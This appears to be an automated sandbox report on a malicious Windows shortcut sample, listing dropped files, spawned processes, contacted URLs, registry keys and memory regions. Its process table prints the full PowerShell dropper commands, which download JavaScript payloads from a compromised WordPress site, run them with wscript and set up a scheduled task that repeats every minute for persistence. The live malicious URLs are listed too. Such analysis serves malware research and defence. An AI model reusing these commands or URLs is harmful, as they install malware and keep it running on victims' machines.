Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
mX3IqRiuFo.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:54 2024, atime=Mon Apr 8
20:19:11 2024, length=455680, window=hidenormalshowminimized
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\241XU6KV2DFH.js
|
ASCII text, with very long lines (398)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gl1kgu4.kqv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f45x0lb5.rzu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4f3pmi2.zdk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa5gjzmm.aew.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvhvl0nc.y0a.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0otm22q.hkd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybs0whv4.vlc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5llsei5.crc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5e80ae42b9d74ef9.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AA3SPT5ZBVZTL0B9KYES.temp
|
data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php');
$s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js');
schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js
' * 2)) /tn HAoyOEGl0;
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js
EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0
|
||
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js
"
|
||
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js
"
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
|
||
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js
"
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 8 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.italialife24.it
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
|
46.254.34.201
|
||
https://www.italialife24.it/
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/0
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
|
46.254.34.201
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.ph
|
unknown
|
||
https://www.italialife24.it/wp-content
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/a
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
|
46.254.34.201
|
||
https://www.italialife24.it/wp-c
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phpr
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/unt
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
|
unknown
|
||
http://www.microsoft.co)
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://crl.v
|
unknown
|
||
https://oneget.org
|
unknown
|
||
http://italialife24.it
|
unknown
|
||
http://www.italialife24.it
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
italialife24.it
|
46.254.34.201
|
||
www.italialife24.it
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
46.254.34.201
|
italialife24.it
|
Italy
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
26617450000
|
heap
|
page read and write
|
||
1EE7BC97000
|
heap
|
page read and write
|
||
214BC994000
|
trusted library allocation
|
page read and write
|
||
15252A04000
|
trusted library allocation
|
page read and write
|
||
15252C60000
|
trusted library allocation
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
199EC897000
|
heap
|
page execute and read and write
|
||
199EA787000
|
heap
|
page read and write
|
||
110077F000
|
stack
|
page read and write
|
||
152696FF000
|
heap
|
page read and write
|
||
199EC1A5000
|
heap
|
page read and write
|
||
AB4444E000
|
stack
|
page read and write
|
||
2661548F000
|
heap
|
page read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page execute and read and write
|
||
201046F2000
|
heap
|
page read and write
|
||
7FFD34866000
|
trusted library allocation
|
page execute and read and write
|
||
26618B68000
|
trusted library allocation
|
page read and write
|
||
1F0C41B0000
|
heap
|
page read and write
|
||
7FFD34794000
|
trusted library allocation
|
page read and write
|
||
199EA665000
|
heap
|
page read and write
|
||
1D583B3F000
|
heap
|
page read and write
|
||
266172ED000
|
heap
|
page read and write
|
||
19E82E46000
|
heap
|
page read and write
|
||
199EC730000
|
trusted library allocation
|
page read and write
|
||
19E82E4C000
|
heap
|
page read and write
|
||
214BDF03000
|
trusted library allocation
|
page read and write
|
||
266191AE000
|
trusted library allocation
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page execute and read and write
|
||
E0B50FD000
|
stack
|
page read and write
|
||
AB43379000
|
stack
|
page read and write
|
||
1EE7D730000
|
heap
|
page read and write
|
||
27145D60000
|
heap
|
page read and write
|
||
19E82FC5000
|
heap
|
page read and write
|
||
266181BD000
|
trusted library allocation
|
page read and write
|
||
201046A9000
|
heap
|
page read and write
|
||
AB4420D000
|
stack
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
199EA78D000
|
heap
|
page read and write
|
||
214D4C0B000
|
heap
|
page read and write
|
||
266173D0000
|
heap
|
page read and write
|
||
27675378000
|
heap
|
page read and write
|
||
1525203C000
|
trusted library allocation
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
26618B93000
|
trusted library allocation
|
page read and write
|
||
19E82E1E000
|
heap
|
page read and write
|
||
1524F6A5000
|
heap
|
page read and write
|
||
1D583B0B000
|
heap
|
page read and write
|
||
214BA87F000
|
heap
|
page read and write
|
||
11006FD000
|
stack
|
page read and write
|
||
214BA8B8000
|
heap
|
page read and write
|
||
214BDF0A000
|
trusted library allocation
|
page read and write
|
||
1EE7BCD8000
|
heap
|
page read and write
|
||
15269766000
|
heap
|
page read and write
|
||
15252A18000
|
trusted library allocation
|
page read and write
|
||
26615605000
|
heap
|
page read and write
|
||
2C685D50000
|
heap
|
page read and write
|
||
19981757000
|
trusted library allocation
|
page read and write
|
||
B788EFE000
|
stack
|
page read and write
|
||
26617606000
|
trusted library allocation
|
page read and write
|
||
AB4353B000
|
stack
|
page read and write
|
||
201046D2000
|
heap
|
page read and write
|
||
199EA660000
|
heap
|
page read and write
|
||
1D583B0B000
|
heap
|
page read and write
|
||
152529FC000
|
trusted library allocation
|
page read and write
|
||
1D583B67000
|
heap
|
page read and write
|
||
15B0FA49000
|
heap
|
page read and write
|
||
AB430FE000
|
stack
|
page read and write
|
||
1D583B3D000
|
heap
|
page read and write
|
||
199EC5D3000
|
trusted library allocation
|
page read and write
|
||
2662F7C1000
|
heap
|
page read and write
|
||
7FFD3482C000
|
trusted library allocation
|
page execute and read and write
|
||
1D583B01000
|
heap
|
page read and write
|
||
1526971D000
|
heap
|
page read and write
|
||
14E61F6000
|
stack
|
page read and write
|
||
15B0FC55000
|
heap
|
page read and write
|
||
19E82DEA000
|
heap
|
page read and write
|
||
14E6179000
|
stack
|
page read and write
|
||
1524F650000
|
heap
|
page readonly
|
||
201046D6000
|
heap
|
page read and write
|
||
19981664000
|
trusted library allocation
|
page read and write
|
||
796C5FF000
|
stack
|
page read and write
|
||
CA9DAFF000
|
stack
|
page read and write
|
||
2FD4BFE000
|
stack
|
page read and write
|
||
19980233000
|
trusted library allocation
|
page read and write
|
||
756B4FE000
|
stack
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
15B0FC5D000
|
heap
|
page read and write
|
||
1100978000
|
stack
|
page read and write
|
||
AB4363E000
|
stack
|
page read and write
|
||
2010472A000
|
heap
|
page read and write
|
||
214BAA60000
|
heap
|
page read and write
|
||
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
1D583B55000
|
heap
|
page read and write
|
||
15B0FA19000
|
heap
|
page read and write
|
||
1998008B000
|
trusted library allocation
|
page read and write
|
||
BFD7FFF000
|
stack
|
page read and write
|
||
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
199EC84B000
|
heap
|
page read and write
|
||
15252A1A000
|
trusted library allocation
|
page read and write
|
||
19E82E33000
|
heap
|
page read and write
|
||
201046D2000
|
heap
|
page read and write
|
||
2662F7B7000
|
heap
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page execute and read and write
|
||
1EE7DB70000
|
heap
|
page read and write
|
||
7DF434F10000
|
trusted library allocation
|
page execute and read and write
|
||
BFD7DFE000
|
stack
|
page read and write
|
||
214BA850000
|
heap
|
page read and write
|
||
7FFD34890000
|
trusted library allocation
|
page execute and read and write
|
||
214BC3E0000
|
heap
|
page execute and read and write
|
||
BFD7909000
|
stack
|
page read and write
|
||
152696C0000
|
heap
|
page read and write
|
||
AB43438000
|
stack
|
page read and write
|
||
1525139E000
|
heap
|
page read and write
|
||
7FFD34876000
|
trusted library allocation
|
page execute and read and write
|
||
796C877000
|
stack
|
page read and write
|
||
214D4AF0000
|
heap
|
page read and write
|
||
19E82E33000
|
heap
|
page read and write
|
||
214BAAA0000
|
trusted library allocation
|
page read and write
|
||
1EE7BC8C000
|
heap
|
page read and write
|
||
266275A1000
|
trusted library allocation
|
page read and write
|
||
201046CE000
|
heap
|
page read and write
|
||
19981675000
|
trusted library allocation
|
page read and write
|
||
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
19E82DEF000
|
heap
|
page read and write
|
||
276752D0000
|
heap
|
page read and write
|
||
1EE7BCB8000
|
heap
|
page read and write
|
||
199901B0000
|
trusted library allocation
|
page read and write
|
||
1D583B01000
|
heap
|
page read and write
|
||
202819A0000
|
heap
|
page read and write
|
||
202819B1000
|
heap
|
page read and write
|
||
19E82E33000
|
heap
|
page read and write
|
||
19981699000
|
trusted library allocation
|
page read and write
|
||
14E627B000
|
stack
|
page read and write
|
||
7FFD3492A000
|
trusted library allocation
|
page read and write
|
||
110188C000
|
stack
|
page read and write
|
||
7FFD3478B000
|
trusted library allocation
|
page read and write
|
||
2662F78D000
|
heap
|
page read and write
|
||
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
214BA820000
|
heap
|
page read and write
|
||
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
15269757000
|
heap
|
page read and write
|
||
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
AB4373B000
|
stack
|
page read and write
|
||
26618B96000
|
trusted library allocation
|
page read and write
|
||
1525136D000
|
heap
|
page read and write
|
||
199EC990000
|
heap
|
page read and write
|
||
199EA630000
|
heap
|
page read and write
|
||
27145DB8000
|
heap
|
page read and write
|
||
214D4C05000
|
heap
|
page read and write
|
||
2C685D60000
|
heap
|
page read and write
|
||
201046A2000
|
heap
|
page read and write
|
||
14E704D000
|
stack
|
page read and write
|
||
14E62F7000
|
stack
|
page read and write
|
||
214D49D9000
|
heap
|
page read and write
|
||
26618B7A000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
214BDF14000
|
trusted library allocation
|
page read and write
|
||
19E82E0D000
|
heap
|
page read and write
|
||
1EE7BC60000
|
heap
|
page read and write
|
||
7FFD34784000
|
trusted library allocation
|
page read and write
|
||
199EA6B0000
|
heap
|
page read and write
|
||
19981A12000
|
trusted library allocation
|
page read and write
|
||
199ECA90000
|
heap
|
page read and write
|
||
19E82E3D000
|
heap
|
page read and write
|
||
19980001000
|
trusted library allocation
|
page read and write
|
||
2010470F000
|
heap
|
page read and write
|
||
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
214CCBEE000
|
trusted library allocation
|
page read and write
|
||
214BDF63000
|
trusted library allocation
|
page read and write
|
||
15B0FA00000
|
heap
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
19981671000
|
trusted library allocation
|
page read and write
|
||
214BA870000
|
heap
|
page read and write
|
||
26617550000
|
heap
|
page execute and read and write
|
||
1D583B8C000
|
heap
|
page read and write
|
||
15269550000
|
heap
|
page read and write
|
||
214D4C15000
|
heap
|
page read and write
|
||
1100AFE000
|
stack
|
page read and write
|
||
20281A17000
|
heap
|
page read and write
|
||
CA9D7AB000
|
stack
|
page read and write
|
||
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
AB4434C000
|
stack
|
page read and write
|
||
14BBAFE000
|
stack
|
page read and write
|
||
202819CB000
|
heap
|
page read and write
|
||
14E5CFE000
|
stack
|
page read and write
|
||
20281950000
|
heap
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
19990010000
|
trusted library allocation
|
page read and write
|
||
7FFD34830000
|
trusted library allocation
|
page execute and read and write
|
||
756BBFF000
|
stack
|
page read and write
|
||
1EE7BCCA000
|
heap
|
page read and write
|
||
202819F5000
|
heap
|
page read and write
|
||
2661545F000
|
heap
|
page read and write
|
||
1F0C4294000
|
heap
|
page read and write
|
||
26616F06000
|
heap
|
page execute and read and write
|
||
214BC370000
|
heap
|
page read and write
|
||
20104600000
|
heap
|
page read and write
|
||
152696F3000
|
heap
|
page read and write
|
||
1D583B79000
|
heap
|
page read and write
|
||
201046FC000
|
heap
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34922000
|
trusted library allocation
|
page read and write
|
||
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
199EA670000
|
heap
|
page read and write
|
||
214D4C2B000
|
heap
|
page read and write
|
||
27675550000
|
heap
|
page read and write
|
||
BFD83FE000
|
stack
|
page read and write
|
||
214D4BD0000
|
heap
|
page read and write
|
||
15269630000
|
heap
|
page execute and read and write
|
||
14BBFFF000
|
stack
|
page read and write
|
||
7FFD34773000
|
trusted library allocation
|
page execute and read and write
|
||
199EA7CF000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
2FD4CFE000
|
stack
|
page read and write
|
||
98470FF000
|
stack
|
page read and write
|
||
214BA8F5000
|
heap
|
page read and write
|
||
7FFD34912000
|
trusted library allocation
|
page read and write
|
||
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
199EC740000
|
heap
|
page execute and read and write
|
||
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
B788FFE000
|
stack
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
20281A0B000
|
heap
|
page read and write
|
||
796C57F000
|
stack
|
page read and write
|
||
1EE7BCAE000
|
heap
|
page read and write
|
||
15B0F9FC000
|
heap
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
201046BE000
|
heap
|
page read and write
|
||
20104719000
|
heap
|
page read and write
|
||
7FFD34A8B000
|
trusted library allocation
|
page read and write
|
||
2339A79000
|
stack
|
page read and write
|
||
199EC846000
|
heap
|
page read and write
|
||
266153E0000
|
heap
|
page read and write
|
||
1998164D000
|
trusted library allocation
|
page read and write
|
||
199EA795000
|
heap
|
page read and write
|
||
1524F5E0000
|
heap
|
page read and write
|
||
BFD82FE000
|
stack
|
page read and write
|
||
1524F4FD000
|
heap
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
1524F50D000
|
heap
|
page read and write
|
||
26615420000
|
trusted library allocation
|
page read and write
|
||
266191B2000
|
trusted library allocation
|
page read and write
|
||
1D583B1D000
|
heap
|
page read and write
|
||
266154AF000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
110030E000
|
stack
|
page read and write
|
||
1524F3A0000
|
heap
|
page read and write
|
||
26617320000
|
heap
|
page read and write
|
||
26615517000
|
heap
|
page read and write
|
||
B5F04FF000
|
unkown
|
page read and write
|
||
7FFD3483C000
|
trusted library allocation
|
page execute and read and write
|
||
19981700000
|
trusted library allocation
|
page read and write
|
||
15B0F9D7000
|
heap
|
page read and write
|
||
1EE7BCBB000
|
heap
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
19E82E6B000
|
heap
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
AB432FD000
|
stack
|
page read and write
|
||
20106503000
|
heap
|
page read and write
|
||
214D492B000
|
heap
|
page read and write
|
||
202819A8000
|
heap
|
page read and write
|
||
1EE7BEE5000
|
heap
|
page read and write
|
||
26617352000
|
heap
|
page read and write
|
||
214D4AD0000
|
heap
|
page read and write
|
||
214D4AC0000
|
heap
|
page execute and read and write
|
||
214BDC60000
|
trusted library allocation
|
page read and write
|
||
1524F660000
|
trusted library allocation
|
page read and write
|
||
20104674000
|
heap
|
page read and write
|
||
19E82FC0000
|
heap
|
page read and write
|
||
2010469D000
|
heap
|
page read and write
|
||
14E5D7E000
|
stack
|
page read and write
|
||
1D583AC5000
|
heap
|
page read and write
|
||
214BAAE0000
|
trusted library allocation
|
page read and write
|
||
20281BC0000
|
heap
|
page read and write
|
||
2FD458A000
|
stack
|
page read and write
|
||
201046B6000
|
heap
|
page read and write
|
||
14BBEFF000
|
stack
|
page read and write
|
||
199EC795000
|
heap
|
page read and write
|
||
20104670000
|
heap
|
page read and write
|
||
199816BA000
|
trusted library allocation
|
page read and write
|
||
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
152696FA000
|
heap
|
page read and write
|
||
199EC180000
|
trusted library allocation
|
page read and write
|
||
26618B82000
|
trusted library allocation
|
page read and write
|
||
214BA8AE000
|
heap
|
page read and write
|
||
7FFD3492A000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
271460F5000
|
heap
|
page read and write
|
||
7FFD3482C000
|
trusted library allocation
|
page execute and read and write
|
||
214BC420000
|
heap
|
page read and write
|
||
19E82E6B000
|
heap
|
page read and write
|
||
796D7CF000
|
stack
|
page read and write
|
||
1F0C40B7000
|
heap
|
page read and write
|
||
110190C000
|
stack
|
page read and write
|
||
B7895FE000
|
stack
|
page read and write
|
||
1D583B3E000
|
heap
|
page read and write
|
||
26615593000
|
trusted library allocation
|
page read and write
|
||
1D583B39000
|
heap
|
page read and write
|
||
214D4C17000
|
heap
|
page read and write
|
||
214D49DD000
|
heap
|
page read and write
|
||
AB42DDF000
|
stack
|
page read and write
|
||
19E82E3D000
|
heap
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
266190E8000
|
trusted library allocation
|
page read and write
|
||
19E82E1B000
|
heap
|
page read and write
|
||
20108020000
|
trusted library allocation
|
page read and write
|
||
15252A22000
|
trusted library allocation
|
page read and write
|
||
26615380000
|
heap
|
page read and write
|
||
1EE7BD04000
|
heap
|
page read and write
|
||
1D583B0A000
|
heap
|
page read and write
|
||
B5F047B000
|
stack
|
page read and write
|
||
201046AC000
|
heap
|
page read and write
|
||
15B0F9D7000
|
heap
|
page read and write
|
||
7FFD34932000
|
trusted library allocation
|
page read and write
|
||
796D84E000
|
stack
|
page read and write
|
||
1100BFB000
|
stack
|
page read and write
|
||
1D5839E0000
|
heap
|
page read and write
|
||
214BE545000
|
trusted library allocation
|
page read and write
|
||
7FFD34890000
|
trusted library allocation
|
page execute and read and write
|
||
19E82DC7000
|
heap
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
26615497000
|
heap
|
page read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
15261421000
|
trusted library allocation
|
page read and write
|
||
2339AFE000
|
unkown
|
page read and write
|
||
214BE541000
|
trusted library allocation
|
page read and write
|
||
110174D000
|
stack
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page execute and read and write
|
||
2C686095000
|
heap
|
page read and write
|
||
26616F10000
|
heap
|
page read and write
|
||
1D583A00000
|
heap
|
page read and write
|
||
27675555000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
AB434B8000
|
stack
|
page read and write
|
||
1D583B55000
|
heap
|
page read and write
|
||
AB4307F000
|
stack
|
page read and write
|
||
AB433BF000
|
stack
|
page read and write
|
||
796C77D000
|
stack
|
page read and write
|
||
26615590000
|
trusted library allocation
|
page read and write
|
||
199EC61F000
|
heap
|
page read and write
|
||
214BA963000
|
heap
|
page read and write
|
||
201046FC000
|
heap
|
page read and write
|
||
AB443CC000
|
stack
|
page read and write
|
||
1524F507000
|
heap
|
page read and write
|
||
199EC190000
|
heap
|
page read and write
|
||
15B0F950000
|
heap
|
page read and write
|
||
E0B479A000
|
stack
|
page read and write
|
||
7FFD3477D000
|
trusted library allocation
|
page execute and read and write
|
||
201046FC000
|
heap
|
page read and write
|
||
E0B4DFF000
|
stack
|
page read and write
|
||
214BA8B4000
|
heap
|
page read and write
|
||
796C67D000
|
stack
|
page read and write
|
||
19E82E42000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
202819D0000
|
heap
|
page read and write
|
||
7FFD3493A000
|
trusted library allocation
|
page read and write
|
||
20104680000
|
heap
|
page read and write
|
||
14E64FE000
|
stack
|
page read and write
|
||
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
B7891FF000
|
stack
|
page read and write
|
||
1D583AFC000
|
heap
|
page read and write
|
||
1EE7BCC1000
|
heap
|
page read and write
|
||
2662F798000
|
heap
|
page read and write
|
||
1EE7BC97000
|
heap
|
page read and write
|
||
20106500000
|
heap
|
page read and write
|
||
214D4BF6000
|
heap
|
page read and write
|
||
15251300000
|
heap
|
page read and write
|
||
1D583B37000
|
heap
|
page read and write
|
||
15B0F9A0000
|
heap
|
page read and write
|
||
19E82DF6000
|
heap
|
page read and write
|
||
B7893FE000
|
stack
|
page read and write
|
||
19E867C0000
|
trusted library allocation
|
page read and write
|
||
1998166D000
|
trusted library allocation
|
page read and write
|
||
1EE7BD07000
|
heap
|
page read and write
|
||
1524F725000
|
heap
|
page read and write
|
||
B7892FE000
|
stack
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
